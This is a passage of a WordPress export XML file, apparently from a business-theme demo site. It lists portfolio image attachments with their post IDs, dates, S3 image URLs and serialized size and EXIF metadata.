		<wp:post_date_gmt><![CDATA[2020-09-11 04:41:09]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[project-11]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>806</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/project-11.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/project-11.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:605;s:6:"height";i:605;s:4:"file";s:22:"2020/09/project-11.jpg";s:5:"sizes";a:4:{s:6:"medium";a:4:{s:4:"file";s:22:"project-11-300x300.jpg";s:5:"width";i:300;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:22:"project-11-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:22:"project-11-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:22:"project-11-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>project-9</title>
		<link>http://wpdemo.archiwp.com/maxbizz/portfolio/oct-analytics/project-9/</link>
		<pubDate>Fri, 11 Sep 2020 04:45:11 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/project-9.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>811</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 04:45:11]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 04:45:11]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[project-9]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>810</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/project-9.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/project-9.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:605;s:6:"height";i:605;s:4:"file";s:21:"2020/09/project-9.jpg";s:5:"sizes";a:4:{s:6:"medium";a:4:{s:4:"file";s:21:"project-9-300x300.jpg";s:5:"width";i:300;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:21:"project-9-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:21:"project-9-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:21:"project-9-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>project-8</title>
		<link>http://wpdemo.archiwp.com/maxbizz/portfolio/financial-statements/project-8/</link>
		<pubDate>Fri, 11 Sep 2020 04:46:44 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/project-8.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>815</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 04:46:44]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 04:46:44]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[project-8]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>814</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/project-8.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/project-8.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:605;s:6:"height";i:769;s:4:"file";s:21:"2020/09/project-8.jpg";s:5:"sizes";a:4:{s:6:"medium";a:4:{s:4:"file";s:21:"project-8-236x300.jpg";s:5:"width";i:236;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:21:"project-8-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:21:"project-8-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:21:"project-8-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>project-7</title>
		<link>http://wpdemo.archiwp.com/maxbizz/portfolio/insurance-finance/project-7/</link>
		<pubDate>Fri, 11 Sep 2020 04:47:58 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/project-7.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>819</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 04:47:58]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 04:47:58]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[project-7]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>818</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/project-7.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/project-7.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:605;s:6:"height";i:695;s:4:"file";s:21:"2020/09/project-7.jpg";s:5:"sizes";a:4:{s:6:"medium";a:4:{s:4:"file";s:21:"project-7-261x300.jpg";s:5:"width";i:261;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:21:"project-7-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:21:"project-7-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:21:"project-7-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>project-5</title>
		<link>http://wpdemo.archiwp.com/maxbizz/portfolio/fund-management/project-5/</link>
		<pubDate>Fri, 11 Sep 2020 07:01:58 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/project-5.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>823</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 07:01:58]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 07:01:58]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[project-5]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>822</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/project-5.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/project-5.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:605;s:6:"height";i:736;s:4:"file";s:21:"2020/09/project-5.jpg";s:5:"sizes";a:4:{s:6:"medium";a:4:{s:4:"file";s:21:"project-5-247x300.jpg";s:5:"width";i:247;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:21:"project-5-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:21:"project-5-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:21:"project-5-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>project-6</title>
		<link>http://wpdemo.archiwp.com/maxbizz/portfolio/data-analytics/project-6/</link>
		<pubDate>Fri, 11 Sep 2020 07:08:06 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/project-6.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>827</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 07:08:06]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 07:08:06]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[project-6]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>826</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/project-6.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/project-6.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:605;s:6:"height";i:605;s:4:"file";s:21:"2020/09/project-6.jpg";s:5:"sizes";a:4:{s:6:"medium";a:4:{s:4:"file";s:21:"project-6-300x300.jpg";s:5:"width";i:300;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:21:"project-6-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:21:"project-6-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:21:"project-6-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>project-4</title>
		<link>http://wpdemo.archiwp.com/maxbizz/portfolio/enterprise-loan/project-4/</link>
		<pubDate>Fri, 11 Sep 2020 07:12:04 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/project-4.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>831</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 07:12:04]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 07:12:04]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[project-4]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>830</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/project-4.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/project-4.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:719;s:6:"height";i:797;s:4:"file";s:21:"2020/09/project-4.jpg";s:5:"sizes";a:4:{s:6:"medium";a:4:{s:4:"file";s:21:"project-4-271x300.jpg";s:5:"width";i:271;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:21:"project-4-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:21:"project-4-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:21:"project-4-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>project-slide-4</title>
		<link>http://wpdemo.archiwp.com/maxbizz/portfolio/enterprise-loan/project-slide-4/</link>
		<pubDate>Fri, 11 Sep 2020 07:12:26 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/project-slide-4.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>832</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 07:12:26]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 07:12:26]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[project-slide-4]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>830</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/project-slide-4.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/project-slide-4.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:970;s:6:"height";i:580;s:4:"file";s:27:"2020/09/project-slide-4.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:27:"project-slide-4-300x179.jpg";s:5:"width";i:300;s:6:"height";i:179;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:27:"project-slide-4-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:27:"project-slide-4-768x459.jpg";s:5:"width";i:768;s:6:"height";i:459;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:27:"project-slide-4-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:27:"project-slide-4-600x580.jpg";s:5:"width";i:600;s:6:"height";i:580;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>project-slide-5</title>
		<link>http://wpdemo.archiwp.com/maxbizz/portfolio/data-analytics/project-slide-5/</link>
		<pubDate>Fri, 11 Sep 2020 07:13:11 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/project-slide-5.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>835</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 07:13:11]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 07:13:11]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[project-slide-5]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>826</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/project-slide-5.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/project-slide-5.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:970;s:6:"height";i:580;s:4:"file";s:27:"2020/09/project-slide-5.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:27:"project-slide-5-300x179.jpg";s:5:"width";i:300;s:6:"height";i:179;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:27:"project-slide-5-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:27:"project-slide-5-768x459.jpg";s:5:"width";i:768;s:6:"height";i:459;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:27:"project-slide-5-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:27:"project-slide-5-600x580.jpg";s:5:"width";i:600;s:6:"height";i:580;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>project-3</title>
		<link>http://wpdemo.archiwp.com/maxbizz/portfolio/digital-marketing/project-3/</link>
		<pubDate>Fri, 11 Sep 2020 07:15:30 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/project-3.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>838</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 07:15:30]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 07:15:30]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[project-3]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>837</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/project-3.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/project-3.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:719;s:6:"height";i:719;s:4:"file";s:21:"2020/09/project-3.jpg";s:5:"sizes";a:4:{s:6:"medium";a:4:{s:4:"file";s:21:"project-3-300x300.jpg";s:5:"width";i:300;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:21:"project-3-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:21:"project-3-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:21:"project-3-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>project-slide-3</title>
		<link>http://wpdemo.archiwp.com/maxbizz/portfolio/digital-marketing/project-slide-3/</link>
		<pubDate>Fri, 11 Sep 2020 07:15:38 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/project-slide-3.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>839</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 07:15:38]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 07:15:38]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[project-slide-3]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>837</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
